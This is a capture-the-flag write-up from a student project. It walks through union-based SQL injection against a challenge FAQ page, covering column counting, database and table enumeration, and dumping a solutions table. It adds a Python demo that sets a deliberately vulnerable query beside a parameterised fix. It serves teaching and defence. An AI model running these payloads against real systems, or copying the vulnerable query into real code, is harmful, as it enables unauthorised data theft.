FYP 17059
Han Yu
Supervisor: Dr. S. M. Yiu
In the challenge, users are presented with a set of impossible questions and a FAQ page. Users are expected to recover the answers to the questions by performing SQL injection attacks on the FAQ page.
To get the flag, users have to find the answers to the questions listed in the figure on the left. The FAQ page shown below is where the answers have to be found.
Solutions are shown in the following:
The FAQ search wraps the user input in a LIKE pattern, either as LIKE '%[user input]%' or as LIKE "%[user input]%", so the first step is to find which quote character closes the string. The query is assumed to have the form:
SELECT [unknown] FROM [table_name] WHERE [question] LIKE '%[user_input]%'
Step 1. Find the number of columns with ORDER BY (the closing comment "--" must be followed by one space):
' order by 6 ; -- [one space]   (error: the query has fewer than 6 columns)
' order by 5 ; -- [one space]   (succeeds: the query returns 5 columns)
Step 2. Confirm the column count and see which columns are shown on the page:
' and 1=0 union select 1, 2, 3, 4, 5 ; --
Step 3. Read the name of the current database:
' and 1=0 union select 1, 1, 1, database(), 1 ; --
Step 4. List the tables in that database:
' and 1=0 union select 1, 1, 1, table_name, 1 from information_schema.tables where table_schema = 'hkuctfp_db' ; --
Step 5. List the columns of solution_table:
' and 1=0 union select 1, 1, 1, column_name, 1 from information_schema.columns where table_name = 'solution_table' ; --
Step 6. Dump the questions and their answers:
' and 1=0 union select 1, 1, 1, question, answer from solution_table ; --
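The following is an added example, not part of the challenge's own code: it rebuilds the FAQ search on an in-memory SQLite database (table names, columns and sample rows are constructed assumptions modelled on the write-up) and contrasts the string-spliced query that the last payload above exploits with a parameterised query that treats the same input as plain search text. The payload is the final one above with the trailing ";" dropped, because sqlite3's execute() accepts a single statement.

```python
import sqlite3

# Constructed schema: a five-column FAQ table (the column count that the
# ORDER BY probing establishes) and the separate solution_table that holds
# the answers. Names and rows are assumptions, not the challenge's data.
SCHEMA = """
CREATE TABLE faq (id INTEGER, category TEXT, tag TEXT, question TEXT, answer TEXT);
INSERT INTO faq VALUES (1, 'general', 'login', 'How do I log in?', 'Use the form.');
CREATE TABLE solution_table (question TEXT, answer TEXT);
INSERT INTO solution_table VALUES ('impossible question 1', 'secret answer 1');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, user_input):
    # The construction the write-up describes: the input is spliced into
    # LIKE '%...%', so a closing quote ends the string literal and whatever
    # follows is parsed as SQL.
    sql = f"SELECT * FROM faq WHERE question LIKE '%{user_input}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, user_input):
    # Hardened form: the pattern is bound as a parameter, so the input can
    # only ever be matched as data. LIKE wildcards in the input are escaped
    # as well, so a user cannot widen the search with '%' or '_'.
    escaped = (user_input.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_"))
    sql = "SELECT * FROM faq WHERE question LIKE ? ESCAPE '\\'"
    return conn.execute(sql, (f"%{escaped}%",)).fetchall()


# The page's final payload (semicolon removed; see the lead-in above).
PAYLOAD = "' and 1=0 union select 1,1,1,question,answer from solution_table -- "


if __name__ == "__main__":
    # Vulnerable: 'and 1=0' drops every FAQ row and the UNION appends the
    # solution rows. Safe: the payload is just a string nothing matches.
    print(search_vulnerable(connect(), PAYLOAD))
    print(search_safe(connect(), PAYLOAD))
    print(search_safe(connect(), "log in"))
```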